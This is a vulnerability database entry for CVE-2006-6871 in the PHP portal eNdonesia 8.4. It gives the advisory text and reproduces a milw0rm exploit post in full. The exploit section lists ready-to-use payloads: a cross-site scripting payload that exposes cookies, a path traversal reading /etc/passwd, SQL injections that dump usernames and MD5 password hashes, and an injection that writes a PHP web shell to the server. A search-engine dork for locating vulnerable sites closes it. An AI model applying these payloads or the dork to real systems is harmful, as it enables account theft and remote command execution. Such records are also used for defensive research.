Endonesia Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1111865    Vulnerability type: Cross-site scripting
Published: 2006-12-25    Updated: 2007-01-08
CVE ID: CVE-2006-6871    CNNVD-ID: CNNVD-200612-646
Platform: PHP    CVSS score: 6.8
|Vulnerability source
https://www.exploit-db.com/exploits/3004
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-646
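|Vulnerability details
eNdonesia 8.4 contains multiple cross-site scripting (XSS) vulnerabilities that allow remote attackers to inject arbitrary web script or HTML via (1) the mod parameter in a viewlink action in mod.php, (2) the intypeid parameter in a showinfo action in the informasi module in mod.php, (3) the "Your Friend" field in friend.php, or (4) the "Main Text" field in admin.php.
|Exploit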
bugs for Endonesia8.4 
FInd:z1ckX(ru)
mail:map-master@mail.ru
1) http://localhost/en/mod.php?mod=[XSS]&op=viewlink&cid=5
2) http://localhost/en/friend.php your Friend:[XSS]
3) http://localhost/en/admin.php Main Text: [XSS]
4) http://localhost/en/mod.php?mod=informasi&op=showinfo&intypeid= ><script>document.write(document.cookie)</script>
5) http://localhost/en/mod.php?mod=../../../../../etc/passwd%00
6) http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
7) http://localhost/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
8) http://localhost/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*

-=====SHELL====-
http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4 %20union%20select%200,0,'<? system($cmd)?>',0,0,0,0%20from%20authors into outfile '/home/localhost/www/en/cmd.php'/*

-======dork=====-
inurl:mod.php?mod=diskusi&op=   

# milw0rm.com [2006-12-25]
|References

Source: BID
Name: 21333
Link: http://www.securityfocus.com/bid/21333
Source: MILW0RM
Name: 3004
Link: http://www.milw0rm.com/exploits/3004
Source: VUPEN
Name: ADV-2006-5187
Link: http://www.frsirt.com/english/advisories/2006/5187
Source: SECUNIA
Name: 23502
Link: http://secunia.com/advisories/23502
Source: XF
Name: endonesia-modphp-xss(31116)
Link: http://xforce.iss.net/xforce/xfdb/31116
Source: MILW0RM
Name: 3004
Link: http://milw0rm.com/exploits/3004